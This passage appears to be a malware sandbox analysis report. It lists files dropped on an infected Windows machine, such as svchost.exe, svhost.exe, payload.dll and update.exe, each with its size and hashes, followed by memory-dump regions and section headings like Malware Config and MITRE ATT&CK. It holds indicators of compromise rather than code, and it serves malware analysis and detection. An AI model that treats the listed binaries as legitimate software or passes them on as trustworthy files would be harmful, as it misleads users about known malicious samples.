92a5585dd354b3b59c5f44c4b97a11cc74f352d326afae5386b8f313e8f5090c

SHA512
4b5b13450e852378d08aad0eb6e973222c0685d6c8b70bd664ae975797d908bc8ac717c426b7605c761f73f2530ec3d138dc6bd7d4dd41207373e280340f392b

Download Submit
C:\Users\Admin\Desktop\Files\svchost.exe

Filesize
1.1MB

MD5
91d67179286bb8ba2fa400f8ca058e13

SHA1
95a267a1b600aa11ce967b6400ad26c1dc6046b3

SHA256
e39a9b68ccb01a9544537a0843c2c9f72a2357bd48b9df45bb08a5a59349ddf9

SHA512
c75a433bfb22a57ef14221ac790318086babad32912d65794de4a4d57b2b3e6949e7817c31bde4e064f4a2312389d085bcaa07bcdf271e0895f5aa5a543ed59a

Download Submit
C:\Users\Admin\Desktop\Files\svhost.exe

Filesize
502KB

MD5
e3cfe28100238a1001c8cca4af39c574

SHA1
9b80ea180a8f4cec6f787b6b57e51dc10e740f75

SHA256
78f9c811e589ff1f25d363080ce8d338fa68f6d2a220b1dd0360e799bbc17a12

SHA512
511e8a150d6539f555470367933e5f35b00d129d3ed3e97954da57f402d18711dfc86c93acc26f5c2b1b18bd554b8ea4af1ad541cd2564b793acc65251757324

Download Submit
C:\Users\Admin\Desktop\Files\systempreter.exe

Filesize
52KB

MD5
d07714b594ae5d7f674c7fcf6a803807

SHA1
938efbba8d8e34c2d1dcc0db37a84f887ae6724f

SHA256
ad8248e7dafb0a1b3d6c22dac544f0abcfab093a75561e534a473d46917f1d47

SHA512
487306ea6bdd7e247c9b194eae6d1e22fe898161f6417eb773c84144584cfb96c4d47d188f38a349cee7b13887f3fdf81b5542ac914cfe072beb564899553250

Download Submit
C:\Users\Admin\Desktop\Files\tacticalagent-v2.8.0-windows-amd64.exe

Filesize
4.3MB

MD5
ed40540e7432bacaa08a6cd6a9f63004

SHA1
9c12db9fd406067162e9a01b2c6a34a5c360ea97

SHA256
d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

SHA512
07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

Download Submit
C:\Users\Admin\Desktop\Files\testme.exe

Filesize
93KB

MD5
007cc72f39b8261fda0d3ca9054f46bc

SHA1
7a2d2aaa860bced45ebdaa41eba3412c715d27fd

SHA256
b10f27a30807f8c7e6cd91d168b092a03768882b77b2122e5598f01a5c04c0c7

SHA512
2b1894aea4345bb81fa34ddad67e995b1050cbe57760ba3437733f0a7ecf3832e58bbf3cf655254c5744f13e3aa0f56ed891ab4e8d3c715aaa454ac49a565dfc

Download Submit
C:\Users\Admin\Desktop\Files\thin.exe

Filesize
413KB

MD5
ab8861d246eb5110f8dbf6edbad5f5f4

SHA1
5dc2f0eb1b47915deffd833127a4101aa0c8158c

SHA256
357555eab31589927d272a5252d763e7fbf00a60029314df030731e5721df873

SHA512
6b7ea52422cdae06cd7ea3e3e0a7e40ebc5f55d1c5014ec937cdd92a1578bfdc4837112acd2eb2a3b304aa9b97cad62c94b7d11a6cd32f953e3dc8361bcb0009

Download Submit
C:\Users\Admin\Desktop\Files\update.exe

Filesize
6.4MB

MD5
808c6fa683fd69a2a82c51a9ea9fb573

SHA1
cf0097060043c2985d4db8db0f57da29b0910b74

SHA256
6478b146391a79a87287563521a4f7d318e87d84b1304d51a17cff511f2a3ae3

SHA512
459a7da9ae12dee96c3ead651bcce999291e1fdeb8ec76a599a4371cf75d5727a63a4dc48c68910ad0949e4b8eafb0abac021db6d177645fa8a573afe6ec766a

Download Submit
C:\Users\Admin\Desktop\Files\v1saferui.2.exe

Filesize
974KB

MD5
9f117b3928eb8d1fcb9fa272de7f485f

SHA1
f967acf69499dc78ab3c9b24e77100a1a30eebf3

SHA256
503e48eb90dc10d17ca2346bd7cd5b964794c94e941bf3fe929332112c82bd10

SHA512
a706511626d886f89846a710b45f8e5d324c6baf1575145ff11edeaa438dfacb57c24c53f7ad7d410d8f17fcd76ce0a22f19c76a3ce0173f73560360bdb5156b

Download Submit
C:\Users\Admin\Desktop\Files\winbox.exe

Filesize
36KB

MD5
7f79f7e5137990841e8bb53ecf46f714

SHA1
89b2990d4b3c7b1b06394ec116cd59b6585a8c77

SHA256
94f0113ae76742bb2941e823382a89b7f36e6e0de37a63cf39a76c6d1ffbe2da

SHA512
92e1c29c9a375e95cb4307ab9b6b2eaac8b7aea9be9523bdd905baedf8e8ee77bad886076a9b5065fd1ace21e5087358a2fa4d3d2506346139dfb0e580e6df0a

Download Submit
C:\Users\Admin\Desktop\Files\wmnp.exe

Filesize
1.5MB

MD5
705178c18c186b42b535505a12bcd4ce

SHA1
3c36e0c17ce952b4ee349939d961b8fefb733504

SHA256
69e408896f7f8b8291cccbccf18313beb068c2a8a6b0108b4dca316cfe295613

SHA512
58abe4ba477a36fac739094717ac9bc314757fc42766ec68a5b923529ac38b3d25aa68141e388ce13c7abf963f0a93a6119053d774c488c8ac2ddd42428eac0c

Download Submit
C:\Users\Admin\Desktop\Files\wow.exe

Filesize
106KB

MD5
a09ccb37bd0798093033ba9a132f640f

SHA1
eac5450bac4b3693f08883e93e9e219cd4f5a418

SHA256
ff9b527546f548e0dd9ce48a6afacaba67db2add13acd6d2d70c23a8a83d2208

SHA512
aab749fedf63213be8ceef44024618017a9da5bb7d2ba14f7f8d211901bbb87336bd32a28060022f2376fb6028ac4ceb6732324c499459a2663ee644e15fde06

Download Submit
C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

Filesize
1.8MB

MD5
5368b3a3410cebf3292877be26c9d14c

SHA1
4a0adcea3452e9bf09a61b4382bcc30e0ec511c6

SHA256
5a2f0d7a809c1e53ea896753ed0cfc28aca8b9dd8e291b9a441db86785f29fed

SHA512
3d69eba2fbd3b26d1b7e79f7fb7311957ed8670add8ef79387194054e05097285bb919254cecd21e33c51386be0645fe296e6c95a22a50e39b759955f66b5d69

Download Submit
C:\payload.dll

Filesize
9KB

MD5
a6f39ef0808d57f2647eeb6a8c1ce309

SHA1
7a87c66762dc0f022a6eda39fb5f4455a4a9a134

SHA256
705dba4048eee5cc26bf89b4bace79816f9fc4d8aaed6cbfebc4e8177d08ed64

SHA512
f9d616b046741719a7fceca4c06b7d1b2255b5857f0fbc72a59d827aebe1d9d1bc765845a58289af7b565ceed61f6271c8e361b194c88856b0a666622593b917

Download Submit
memory/404-1922-0x0000000000390000-0x00000000003A2000-memory.dmp

Filesize
72KB

Download
memory/460-2128-0x00007FF716220000-0x00007FF71645A000-memory.dmp

Filesize
2.2MB

Download
memory/460-2123-0x00007FF716220000-0x00007FF71645A000-memory.dmp

Filesize
2.2MB

Download
memory/460-2125-0x00007FF716220000-0x00007FF71645A000-memory.dmp

Filesize
2.2MB

Download
memory/1632-1947-0x0000000000BE0000-0x0000000000BF2000-memory.dmp

Filesize
72KB

Download
memory/2220-2072-0x0000000000710000-0x0000000000A34000-memory.dmp

Filesize
3.1MB

Download
memory/2800-2137-0x0000000000960000-0x0000000000C84000-memory.dmp

Filesize
3.1MB

Download
memory/3056-2167-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/3056-2170-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/3056-2168-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/3060-2113-0x0000000000CF0000-0x0000000001014000-memory.dmp

Filesize
3.1MB

Download
memory/3140-1703-0x000001C32D530000-0x000001C32D552000-memory.dmp

Filesize
136KB

Download
memory/3444-2286-0x00000000001B0000-0x00000000004D4000-memory.dmp

Filesize
3.1MB

Download
memory/4328-2138-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4328-2139-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4328-2141-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4572-1925-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4572-1928-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4572-1926-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4616-1912-0x0000000000400000-0x000000000076D000-memory.dmp

Filesize
3.4MB

Download
memory/4616-1910-0x0000000000400000-0x000000000076D000-memory.dmp

Filesize
3.4MB

Download
memory/4616-1911-0x0000000000400000-0x000000000076D000-memory.dmp

Filesize
3.4MB

Download
memory/4616-1909-0x0000000000400000-0x000000000076D000-memory.dmp

Filesize
3.4MB

Download
memory/4616-1958-0x0000000000400000-0x000000000076D000-memory.dmp

Filesize
3.4MB

Download
memory/4884-1583-0x0000000000B00000-0x0000000000B08000-memory.dmp

Filesize
32KB

Download
memory/4884-1584-0x0000000005580000-0x000000000561C000-memory.dmp

Filesize
624KB

Download
memory/4940-2142-0x0000000000840000-0x00000000008A0000-memory.dmp

Filesize
384KB

Download
memory/4952-2049-0x0000000000EB0000-0x0000000000EF2000-memory.dmp

Filesize
264KB

Download
memory/5020-1820-0x000001F9DEE80000-0x000001F9DEE88000-memory.dmp

Filesize
32KB

Download
memory/5128-2111-0x0000000004F20000-0x00000000054C6000-memory.dmp

Filesize
5.6MB

Download
memory/5128-2110-0x00000000001B0000-0x0000000000210000-memory.dmp

Filesize
384KB

Download
memory/5720-2051-0x0000000005450000-0x000000000550C000-memory.dmp

Filesize
752KB

Download
memory/5720-2052-0x0000000005C00000-0x0000000006218000-memory.dmp

Filesize
6.1MB

Download
memory/5720-2045-0x0000000000B00000-0x0000000000B5E000-memory.dmp

Filesize
376KB

Download
memory/5964-2257-0x0000000000F30000-0x0000000001270000-memory.dmp

Filesize
3.2MB

Download
memory/6076-2203-0x0000000005B30000-0x0000000005B4E000-memory.dmp

Filesize
120KB

Download
memory/6076-2073-0x00000000028A0000-0x00000000028D6000-memory.dmp

Filesize
216KB

Download
memory/6076-2074-0x00000000054B0000-0x0000000005ADA000-memory.dmp

Filesize
6.2MB

Download
memory/6076-2474-0x0000000006540000-0x000000000655A000-memory.dmp

Filesize
104KB

Download
memory/6076-2475-0x0000000006590000-0x00000000065B2000-memory.dmp

Filesize
136KB

Download
memory/6076-2099-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/6076-2218-0x0000000006630000-0x000000000667C000-memory.dmp

Filesize
304KB

Download
memory/6076-2096-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/6076-2092-0x0000000005430000-0x0000000005452000-memory.dmp

Filesize
136KB

Download
memory/6076-2473-0x00000000070D0000-0x0000000007166000-memory.dmp

Filesize
600KB

Download
memory/6076-2109-0x0000000005D20000-0x0000000006077000-memory.dmp

Filesize
3.3MB

Download
memory/6696-1697-0x00007FF8E7BA0000-0x00007FF8E7BB4000-memory.dmp

Filesize
80KB

Download
memory/6696-1995-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp

Filesize
156KB

Download
memory/6696-2001-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp

Filesize
100KB

Download
memory/6696-2002-0x00007FF8F5F80000-0x00007FF8F5F8D000-memory.dmp

Filesize
52KB

Download
memory/6696-2003-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp

Filesize
204KB

Download
memory/6696-1993-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp

Filesize
716KB

Download
memory/6696-1979-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp

Filesize
6.4MB

Download
memory/6696-1669-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp

Filesize
6.4MB

Download
memory/6696-1965-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp

Filesize
1.5MB

Download
memory/6696-1670-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp

Filesize
156KB

Download
memory/6696-1974-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp

Filesize
716KB

Download
memory/6696-1959-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp

Filesize
6.4MB

Download
memory/6696-1671-0x00007FF8F6010000-0x00007FF8F601F000-memory.dmp

Filesize
60KB

Download
memory/6696-1685-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp

Filesize
172KB

Download
memory/6696-1687-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp

Filesize
148KB

Download
memory/6696-1686-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp

Filesize
100KB

Download
memory/6696-2000-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp

Filesize
1.5MB

Download
memory/6696-1999-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp

Filesize
148KB

Download
memory/6696-1688-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp

Filesize
1.5MB

Download
memory/6696-1998-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp

Filesize
100KB

Download
memory/6696-1997-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp

Filesize
172KB

Download
memory/6696-1689-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp

Filesize
100KB

Download
memory/6696-1924-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp

Filesize
5.2MB

Download
memory/6696-1690-0x00007FF8F5F80000-0x00007FF8F5F8D000-memory.dmp

Filesize
52KB

Download
memory/6696-1996-0x00007FF8F6010000-0x00007FF8F601F000-memory.dmp

Filesize
60KB

Download
memory/6696-1992-0x00007FF8F5BA0000-0x00007FF8F5BAD000-memory.dmp

Filesize
52KB

Download
memory/6696-1991-0x00007FF8E7BA0000-0x00007FF8E7BB4000-memory.dmp

Filesize
80KB

Download
memory/6696-1691-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp

Filesize
204KB

Download
memory/6696-1908-0x0000014B8AA70000-0x0000014B8AFA3000-memory.dmp

Filesize
5.2MB

Download
memory/6696-1692-0x00007FF8CD530000-0x00007FF8CDB95000-memory.dmp

Filesize
6.4MB

Download
memory/6696-1694-0x0000014B8AA70000-0x0000014B8AFA3000-memory.dmp

Filesize
5.2MB

Download
memory/6696-1907-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp

Filesize
824KB

Download
memory/6696-1900-0x00007FF8E7BC0000-0x00007FF8E7BF3000-memory.dmp

Filesize
204KB

Download
memory/6696-1989-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp

Filesize
824KB

Download
memory/6696-1858-0x00007FF8ECC30000-0x00007FF8ECC49000-memory.dmp

Filesize
100KB

Download
memory/6696-1693-0x00007FF8E6970000-0x00007FF8E6A3E000-memory.dmp

Filesize
824KB

Download
memory/6696-1818-0x00007FF8CD3B0000-0x00007FF8CD52F000-memory.dmp

Filesize
1.5MB

Download
memory/6696-1763-0x00007FF8ECD30000-0x00007FF8ECD55000-memory.dmp

Filesize
148KB

Download
memory/6696-1994-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp

Filesize
5.2MB

Download
memory/6696-1696-0x00007FF8ECEC0000-0x00007FF8ECEE7000-memory.dmp

Filesize
156KB

Download
memory/6696-1700-0x00007FF8F2090000-0x00007FF8F20A9000-memory.dmp

Filesize
100KB

Download
memory/6696-1701-0x00007FF8CCDB0000-0x00007FF8CCE63000-memory.dmp

Filesize
716KB

Download
memory/6696-1695-0x00007FF8CCE70000-0x00007FF8CD3A3000-memory.dmp

Filesize
5.2MB

Download
memory/6696-1698-0x00007FF8ECD60000-0x00007FF8ECD8B000-memory.dmp

Filesize
172KB

Download
memory/6696-1699-0x00007FF8F5BA0000-0x00007FF8F5BAD000-memory.dmp

Filesize
52KB

Download
memory/7260-2202-0x0000000000480000-0x0000000000492000-memory.dmp

Filesize
72KB

Download
memory/7540-2400-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/7540-2716-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/7652-2229-0x0000000005520000-0x0000000005810000-memory.dmp

Filesize
2.9MB

Download
memory/7652-2233-0x00000000051C0000-0x00000000051E2000-memory.dmp

Filesize
136KB

Download
memory/7652-2243-0x0000000005220000-0x00000000053CA000-memory.dmp

Filesize
1.7MB

Download
memory/7652-2228-0x0000000001330000-0x0000000001338000-memory.dmp

Filesize
32KB

Download
memory/7652-2232-0x0000000005130000-0x00000000051BC000-memory.dmp

Filesize
560KB

Download
memory/7776-2236-0x0000000000DA0000-0x00000000010C4000-memory.dmp

Filesize
3.1MB

Download
memory/7812-2287-0x0000000000400000-0x0000000000487000-memory.dmp

Filesize
540KB

Download
memory/8560-2405-0x0000000000400000-0x0000000000500000-memory.dmp

Filesize
1024KB

Download
memory/8580-2334-0x0000000000600000-0x0000000000608000-memory.dmp

Filesize
32KB

Download
memory/9028-2353-0x0000000000100000-0x000000000017E000-memory.dmp

Filesize
504KB

Download
memory/9152-2637-0x0000000000400000-0x0000000000683000-memory.dmp

Filesize
2.5MB

Download
memory/9152-2399-0x0000000000400000-0x0000000000683000-memory.dmp

Filesize
2.5MB

Download
memory/9328-2638-0x0000000004DF0000-0x0000000004E82000-memory.dmp

Filesize
584KB

Download
memory/9328-2648-0x0000000004D90000-0x0000000004D9A000-memory.dmp

Filesize
40KB

Download
memory/9328-2649-0x0000000005010000-0x0000000005066000-memory.dmp

Filesize
344KB

Download
memory/9328-2616-0x0000000000340000-0x000000000037C000-memory.dmp

Filesize
240KB

Download
memory/9408-2463-0x0000000000820000-0x0000000000B44000-memory.dmp

Filesize
3.1MB

Download
memory/9892-2469-0x0000000000580000-0x00000000005C2000-memory.dmp

Filesize
264KB

Download
memory/10008-2617-0x00007FF6B3F20000-0x00007FF6B3F69000-memory.dmp

Filesize
292KB

Download
memory/10008-2479-0x00007FF6B3F20000-0x00007FF6B3F69000-memory.dmp

Filesize
292KB

Download
memory/10008-2689-0x00007FF6B3F20000-0x00007FF6B3F69000-memory.dmp

Filesize
292KB

Download
memory/10488-2731-0x0000000000400000-0x0000000000727000-memory.dmp

Filesize
3.2MB

Download
memory/10656-2707-0x00000000003C0000-0x00000000003D8000-memory.dmp

Filesize
96KB

Download
memory/10764-2639-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads